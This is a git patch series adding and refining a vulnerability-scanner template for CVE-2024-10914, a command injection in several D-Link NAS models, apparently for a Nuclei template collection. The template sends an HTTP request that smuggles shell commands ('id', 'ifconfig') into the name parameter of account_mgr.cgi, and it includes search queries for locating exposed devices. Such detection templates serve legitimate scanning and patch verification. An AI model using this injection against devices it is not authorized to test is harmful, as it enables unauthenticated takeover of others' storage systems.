From 6769c9eba17abc2a90c79d3d2ef9aec2d775a3a9 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Tue, 12 Nov 2024 02:14:36 +0300 Subject: [PATCH 1/3] add cve-2024-10914 --- http/cves/2024/CVE-2024-10914.yaml | 42 ++++++++++++++++++++++++++++++ 1 file changed, 42 insertions(+) create mode 100644 http/cves/2024/CVE-2024-10914.yaml diff --git a/http/cves/2024/CVE-2024-10914.yaml b/http/cves/2024/CVE-2024-10914.yaml new file mode 100644 index 00000000000..0b8a6c1a32d --- /dev/null +++ b/http/cves/2024/CVE-2024-10914.yaml @@ -0,0 +1,42 @@ +id: CVE-2024-10914 + +info: + name: D-Link NAS - Command Injection via Name Parameter + author: s4e-io + severity: critical + description: | + A vulnerability was found in D-Link DNS-320, DNS-320LW, DNS-325 and DNS-340L up to 20241028. It has been declared as critical. Affected by this vulnerability is the function cgi_user_add of the file /cgi-bin/account_mgr.cgi?cmd=cgi_user_add. The manipulation of the argument name leads to os command injection. + reference: + - https://github.com/verylazytech/CVE-2024-10914 + - https://www.usom.gov.tr/bildirim/tr-24-1836 + - https://nvd.nist.gov/vuln/detail/CVE-2024-10914 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-10914 + cwe-id: CWE-707 + epss-score: 0.00092 + epss-percentile: 0.40606 + cpe: cpe:2.3:o:dlink:dns-320_firmware:*:*:*:*:*:*:*:* + metadata: + vendor: dlink + product: dns-320_firmware + shodan-query: http.html:"sharecenter" + fofa-query: body="sharecenter" + tags: cve,cve2024,dlink,sharecenter,rce + +variables: + num: "{{rand_base(12)}}" + +http: + - raw: + - | + GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;echo%20{{num}};%27 HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains(body, "{{num}}")' + - "status_code == 200" + condition: and From 95da466d1f2347da021b8de002514bfc3b2a3b96 Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Tue, 12 Nov 2024 02:23:15 +0300 Subject: [PATCH 2/3] fix --- http/cves/2024/CVE-2024-10914.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/http/cves/2024/CVE-2024-10914.yaml b/http/cves/2024/CVE-2024-10914.yaml index 0b8a6c1a32d..3b2bb9f3f6f 100644 --- a/http/cves/2024/CVE-2024-10914.yaml +++ b/http/cves/2024/CVE-2024-10914.yaml @@ -26,17 +26,17 @@ info: tags: cve,cve2024,dlink,sharecenter,rce variables: - num: "{{rand_base(12)}}" + random: "{{rand_base(12)}}" http: - raw: - | - GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;echo%20{{num}};%27 HTTP/1.1 + GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;echo%20{{random}};%27 HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - - 'contains(body, "{{num}}")' + - 'contains_all(body, "{{random}}", "Content-type: text/html")' - "status_code == 200" condition: and From 82cc7b0e381b6f013cafe1673e87a7591055806c Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 13 Nov 2024 14:10:42 +0530 Subject: [PATCH 3/3] updated payload --- http/cves/2024/CVE-2024-10914.yaml | 20 +++++++++++++++----- 1 file changed, 15 insertions(+), 5 deletions(-) diff --git a/http/cves/2024/CVE-2024-10914.yaml b/http/cves/2024/CVE-2024-10914.yaml index 3b2bb9f3f6f..7a19784ba3b 100644 --- a/http/cves/2024/CVE-2024-10914.yaml +++ b/http/cves/2024/CVE-2024-10914.yaml @@ -25,18 +25,28 @@ info: fofa-query: body="sharecenter" tags: cve,cve2024,dlink,sharecenter,rce -variables: - random: "{{rand_base(12)}}" - http: - raw: - | - GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;echo%20{{random}};%27 HTTP/1.1 + GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;{{command}};%27 HTTP/1.1 Host: {{Hostname}} + payloads: + command: + - "id" + - "ifconfig" + + stop-at-first-match: true + matchers-condition: and matchers: - type: dsl dsl: - - 'contains_all(body, "{{random}}", "Content-type: text/html")' + - "regex('uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)', body)" + - "contains_all(body, 'inet addr:', 'Mask:')" + condition: or + + - type: dsl + dsl: + - 'contains(body, "Content-type: text/html")' - "status_code == 200" condition: and